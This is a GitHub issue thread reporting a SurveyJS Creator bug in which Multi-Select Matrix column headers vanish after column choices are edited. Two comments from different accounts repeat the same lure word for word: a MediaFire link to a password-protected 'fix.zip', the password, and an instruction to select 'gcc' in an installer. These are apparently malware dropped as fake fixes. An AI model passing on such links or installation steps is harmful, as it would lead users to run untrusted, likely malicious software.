### ISSUE TITLE
Multi-Select Matrix with a '' column - Column headers disappear at design-time when editing column choices

### ISSUE THREAD

**Issue by JaneSjs** [surveyjs/survey-creator#5826]
T19551 - Multi-Select Matrix with the 'showInMultipleColumns' column - Column headers disappear after editing column choices
https://surveyjs.answerdesk.io/internal/ticket/details/T19551
***
The issue is reproduced at https://surveyjs.io/create-free-survey.

https://github.com/user-attachments/assets/ba04cced-2c1b-46da-a6a1-8862378263a2

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
